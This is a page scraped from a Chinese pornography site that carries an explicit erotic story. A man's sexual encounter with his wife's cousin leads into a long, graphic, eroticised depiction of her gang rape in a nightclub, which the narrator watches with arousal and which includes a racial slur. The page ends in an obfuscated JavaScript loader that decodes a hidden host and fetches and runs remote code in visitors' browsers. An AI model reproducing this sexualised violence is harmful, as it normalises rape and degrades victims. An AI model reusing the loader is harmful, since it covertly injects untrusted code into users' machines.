返回

小姨子迪吧被操翻18a

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com

我有一个美美的小姨子,老婆四姨家的,25岁,脸蛋跟五官一流,皮肤很白。

从结婚前,我就常常在老婆四姨走动,所以我很清楚的了解,小姨子的脾气,可不是一般人惹得起的。可能因为这样,她让人感到更加的性感。

她第一次让我觉得性感,是婚前有一天我送老婆回家时,在楼下恰好碰到她,她穿着白色的针织毛衣,黑色的超短裙,白色透明的的丝袜,黑色高跟鞋,让我忍不住偷瞄了一下她的腿。她发现我在看她的腿,有意无意的缩了一下,接着,把穿着高跟鞋的脚,用跟顶着地,晃动她的鞋尖。

我可不敢多看,送了这对姐妹花进了楼下大门,就开车回家了。但是脑袋里,就起了一个很糟糕的念头,我想要她腿上的那双丝袜。

日子一天一天过去,总是让我等到有这样的机会……

有一天,我在老婆娘家,坐在客厅里,小姨子回来了,又穿着一双白色的透明丝袜,她进了门,坐在门口跟我打招呼,“姐夫,你今天怎么比我早下班呀?”

边说着,边脱下她的高跟鞋。

看着她性感的丝袜美腿,鸡巴瞬间感觉痒的不行。

“是呀,今天比较早,你要不要换个衣服,你姐,四姨跟姨夫不在,我带你去吃饭?把上班的衣服换一换吧,穿那样多累?”

“好呀,那你等我一下,我去换接着。”

我就在客厅里装的若无其事的,小姨子进了房间开始换衣服。

当小姨子再出来的时候,居然直接挽着我的膀子,拉着我出门了,心里顿时咯噔一下,但是马上又痒痒的,难道小姨子对我有意思?

晚餐回来,刚进门就接到老婆电话,说她跟四姨他们可能要去乡下,明天才能回来,让我照顾点我的小姨子戴文静,我说没问题。

挂了电话,脱了外衣躺在床上玩手机,一会功夫,小姨子从外屋来到卧室,“姐夫,好无聊啊,你打开电视,我们找个恐怖片看会吧!”

我应了声打开电视,找了部林正英的僵尸片,看到一半,我发现小姨子整个身子都已经蜷缩在我怀里了,我说别怕,电影而已,小姨子没出声,然后把双脚夹进我的双腿间不停的动。

我说实话当时我头都大了,因为小姨子的脚就靠近我兄弟的位置,没一会兄弟就昂首挺胸了,突然小姨子抽出双脚,在我耳边说,“姐夫你怎么看个恐怖片也能看的硬起来。”

我尼玛,我当时真服了,明明是你脚不停在我鸡巴边上摩擦,好吗,老子扒光干翻你信吗?

想归想,但是终归没色胆啊,只能不搭腔,小姨子看我没反应,把脸凑过来看着我,似笑非笑。

突然小姨子开始扒开我的秋衣,用舌头舔我的乳头。接着,把我秋裤内裤拉下,掏出我的小弟弟,轻轻摸着我的睾丸,让我全身都酥了。

“姐夫,你今天完蛋了……嘿嘿嘿……”

“文静,你?嗯?”

“等一下你就知道了!”

接着她就骑在我身上,伸出她的舌头,从我的阴囊,一路慢慢的舔,舔到我的鸡巴,然后她抓着我的鸡巴,前后左右,时而抚摸,时而吸吮,可是偏偏就不去碰我的龟头。

我觉得我的脑已经要炸开了,她突然一口吸住我的龟头,然后用她的口水充满她的嘴巴,接着,一面吸,一面用口水发出声音,我很快就被她舔的不要不要的了,立马翻身抵抗,将小姨子压在身下,抓住她的丝袜,用牙齿咬破,将小姨子的黑色内裤拨到一边,扒开她穿着黑色高跟鞋的双腿,然后用手指插进她的小鲍鱼不停搅动,小姨子哼了起来……

没费多少功夫,她的小鲍鱼就开始流水了,等她享受的差不多了,我下了床,然后把小姨子拉了下来,让她穿着丝袜跟黑色的高跟鞋跪在地上,按着小姨子的头,把鸡巴送进了小姨子的小嘴里抽插起来。

小姨子卖弄的舔着我的鸡巴,伴随着阵阵噗叽噗叽的口水声,小姨子帮我口交了快十分钟了,然后我把小姨子扶起来,让她仰着头躺在床上,用穿着高跟鞋的两只脚支撑在地上,看着小姨子被撕烂的白色丝袜,还有穿着性感细跟高跟鞋的美腿,顿时我兽性大发,爬到床上蹲下,然后把涨的老高的鸡巴插进了小姨子的嘴里,慢慢的往她喉管里顶。

小姨子被我的深喉大法插的腮帮鼓的老高,插进去再慢慢抽出来,每次顶到小姨子的喉管时,我的鸡巴就像触电一样,爽的我大叫,没想到平时看着很正经的小姨子有一天会被我压在胯下,而且还跟我深喉,慢慢的我加快了速度,在深喉的刺激下,我很快就受不了了,一股脑把我的热精都送入她的嘴巴里。

小姨子把所有的精液都含在嘴里,然后靠向我,要吻我的嘴,我连忙躲开。

“哼,姐夫,虎毒不食子,不敢吃自己的儿子是吧?哈哈哈,我也敢吞!”

说完,小姨子居然一股脑的将我的热精全部吞进肚子里,然后小姨子说:“姐夫爽吗?嘿嘿,今天就让你快活到这里,下次姐不在我就饶不了你了,嘿嘿嘿……”

想想算了,小姨子能这样已经是我天大的性福了,下次找到机会再把她压在胯下,狠狠干……

时间过的好快,那晚以后小姨子好像没发生过一样,再也没对我有过任何暧昧,顿时让我失落了好久,以为我俩的关系就这样不了了之了,可是一次偶然的机会让我看到了很大尺度的疯狂,让我心疼了很久很久……

那晚老婆跟我爸妈去老婆老家打牌,小姨子跑过来说:“姐夫,我们又不会打牌,你开车带我去迪吧玩吧,我们去嗨一会。”

我说那好吧,然后开车去市里的王朝迪吧。

正逢周末,迪吧人山人海,我们叫来服务生,带着小姨子买了个卡座,点了一瓶洋酒加10瓶啤酒,然后喝着酒看舞台上的领舞穿着性感的比基尼跳舞,喝了半个多小时,小姨子说:“姐夫你看台上的美女好看吗,要不要小姨子出马帮你把她泡过来,晚上你就可以好好享用了嘿嘿……”

我说一边去别闹,小姨子吐了个鬼脸,然后脱了外套,拿着酒杯,站在卡座前的栏杆边摇了起来,我坐着从背后看着小姨子,小姨子戴文静穿的很暴露,无肩裹胸的粉色连衣裙,白色透明的丝袜细腿,脚上穿着一双性感的细跟红色高跟鞋,摇着小屁股,看的我鸡巴不停的跳,硬的不行,真想冲上去按倒直接操翻她的小穴。

小姨子站着摇了差不多20分钟,然后跑过来放下酒杯,拉着我的手说:“姐夫我们在这没意思,陪我下去跳舞。”

说完拉着我往舞台跑好多啊,我们左挤右推的,好不容易挤到舞台中间的位置,小姨子拉着我的手抱着她的屁股,站在我前面摇了起来。

说实话,有了上次的激情以后,小姨子好像很放的开,不停的用臀摩擦着我的裤裆中央,这可苦了我了,没跳一会,鸡巴已经翘的老高,小姨子文静还不时举着双手,水蛇般的扭着腰肢,回头朝我笑,笑的我心都痒了,一曲跳完又一曲,我出了好多汗,靠着小姨子的耳边说:“文静,好热啊,我们上去休息会吧。”

小姨子说:“跳完这一曲,这一曲是我最喜欢的社会摇。”

我说好吧,小姨子继续扭着她水蛇般的腰肢,小屁股继续调戏着我的鸡巴。

“社社社社社社,社会摇……”

舞曲是蛮带劲的,一曲才跳了几十秒,突然我被旁边不知道从哪冒出来的几个纹身的光头大汉撞到一边,接着被一个黄毛怪搂着,黄毛怪叫我别动继续跳,敢动就捅死我。

我吓住了,不敢动,然后看见一个光头居然接替了我的位置,站在小姨子的背后扭起了屁股,好像还不停的对着小姨子文静的背后耸动着屁股。

我喊了声小姨子的名字,旁边的黄毛怪立即瞪着眼睛看着我,亮了下别在裤带上的刀子,我吓的立马闭嘴了,继续假装跳舞。跳着跳着,我发现小姨子文静不知不觉的已经被十几个带纹身的大汉围在了中间,小姨子还浑然不知的跳着,完全没注意后面早已经换人了,还不停的扭着腰肢,用屁股蹭着后面光头大汉的鸡巴,我心里那个急啊,想喊又不敢喊。

又跳了一会,我发现文静身后的大光头好像把手伸进了小姨子的裙子里,文静吓了一跳,回头一看不是自己的姐夫,然后挣扎了起来,嘴里说着什么我听不到,然后就看见小姨子被大光头捉住了手,旁边的十几个纹身大汉一起把文静挤在中间了,接着就看见在小姨子文静身后的大光头,手上抓着条撕烂了的黑色的蕾丝内裤。小姨子夹紧双腿,双手捂着裙摆,这时小姨子文静身边的好多大汉开始拉扯着小姨子,挣扎中,小姨子无肩的粉色连衣裙已经从上面被扒到乳房以下了,大光头从背后解开了文静的黑色胸罩,我看见文静张大嘴好像在叫,刚叫就被一个大汉捂住了嘴,然后又一个大汉掀起了文静的裙子……

这时小姨子文静已经近乎全裸,光着下身,被按着头对着大光头的裆部,弯着腰撅着光溜溜的屁股对着另一个大汉的裆部,粉色连衣裙被推成一团布挂在小姨子的腰上,两个乳房垂在空中。

大光头解开裤子,掏出胀大的鸡巴,捏开小姨子的小嘴,把鸡巴插进了小姨子的嘴里操了起来,文静后面的大汉也没闲着,掏出鸡巴扶着小姨子的屁股,然后使劲往小姨子的鲍鱼里插……

小姨子挣扎的双手被旁边的人抓住,两个大汉一前一后的开始轮奸小姨子文静,文静拗不过,被操的一前一后的到处晃,穿着高跟鞋站不稳,跌跌撞撞的,大光头拿文静的小嘴当小穴一样猛操,还不时的伸手抓住小姨子文静在空中被插的乱晃的乳房,使劲的捏。

小姨子被嘴里的粗鸡巴插的恶心,想吐又吐不了,张着嘴含着大光头进进出出的鸡巴,口水被插的成一条线的往舞台地板上流,双手被人抓住乱动着,我在旁边开始还难过,后来看着小姨子文静穿着红色高跟鞋被人一前一后的轮奸着,渐渐的我的鸡巴也不听控制的翘的老高。

在后面操文静鲍鱼的大汉插了差不多二十几分钟,然后拔出鸡巴,对着文静的小屁股射了一堆精,精液顺着小姨子抖动的屁股滴在了地板上,那个大汉扶着鸡巴在文静的屁股上擦了擦,然后退到一旁,旁边另外一个人继续扶着鸡巴操进文静的鲍鱼,然后用右手抓住小姨子的右腿弯,抬起文静的右腿,加大速度操着小姨子的鲍鱼,前面的大光头突然猛的拨出鸡巴,对着小姨子的脸上射出一堆热精,然后抖了几下把鸡巴继续插进小姨子的小嘴,让小姨子舔干净后满意的退到一旁,换另一个继续来干小姨子的小嘴……

此时小姨子好像已经被操的崩溃了,已经不反抗了,右脚上的红色高跟鞋已经被操的掉在地板上,右脚被架着操的直晃,剩下左脚穿着高跟鞋撑着地面,跟太细都站不稳。

这时人群中挤进来两个带头盔,拿警棍的保安,一个保安刚张嘴想说话,立马被几个人拖出去了,剩下的一个吓得头一低跑掉了,留下舞台中央继续被轮奸的小姨子。

又过了一会,操着小姨子鲍鱼的大汉猛的拔出鸡巴,对着文静屁股射出热精的时候,我看见小姨子的小穴喷出了一道水柱,可能小姨子已经被轮奸出了高潮,一群人好像在笑,然后又一个大汉接力似的扶着鸡巴干进了小姨子的小穴……

就这样小姨子被一前一后,差不多被操了1个多小时,眼泪混着精液已经模糊了文静精致的脸,此时,后面的射了精,在文静屁股上擦干净以后,来了个很黑的老外,摩挲着鸡巴,然后,天啊,他竟然对着小姨子还没开发的屁眼一点点的往里插,文静的脸都疼的扭曲了,嘴巴瞬间长大,插在文静嘴里的鸡巴下面流出了一团口水,黑鬼爽的淫笑,用又粗又长的鸡巴在小姨子的嫩菊里搅动,鸡巴都不能全部插进去,操了不知道多少下,黑鬼浑身颤抖,直接把一堆精子留在了小姨子的菊洞里,然后拔出粗屌又操进了小姨子的小穴耸动了几下,才满意的离开。

一群人架着小姨子轮奸了快两个小时,然后一个变态大汉捡起保安丢下的警棍,淫笑着把警棍往文静流着精液的鲍鱼里插,好像听到说什么堵住,怀孕什么的,然后几个人帮文静穿好连衣裙,相互搂着离开了,丢下舞台上一群目瞪口呆的人看着小姨子满脸精液的站在舞台中央,一只脚穿着红色细跟高跟鞋,腿上的白色透明丝袜被撕的破破烂烂,舞台中央地板上滴了一滩滩的精液。

文静愣了一会,捂着嘴哭着跑出了迪吧,我追了出去,看见文静坐上了计程车,从那以后,我再也没有见过我这位美丽又性感的小姨子,听家人说好像去了北方,每每想起她,我都不觉的流泪…… 【完】

评分
相关推荐
3.0分

3.0分 小姨子迪吧被操翻18a

3.0分

3.0分 小姨子迪吧被操翻18a

3.0分

3.0分 女友迪吧被迷记f5d

3.0分

3.0分 女友迪吧被迷记f5d

3.0分

3.0分 为小姨子播种我幹翻天db9

3.0分

3.0分 为小姨子播种我幹翻天db9

3.0分

3.0分 操小姨子和她女儿 -896

3.0分

3.0分 [两连襟玩小姨子](操小姨子)作者:不详-乱伦小说255

3.0分

3.0分 我夺走了小姨子的贞操e10

3.0分

3.0分 色姨被外甥操f42


提示:为了您能够顺利的找到本站,请牢记:WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};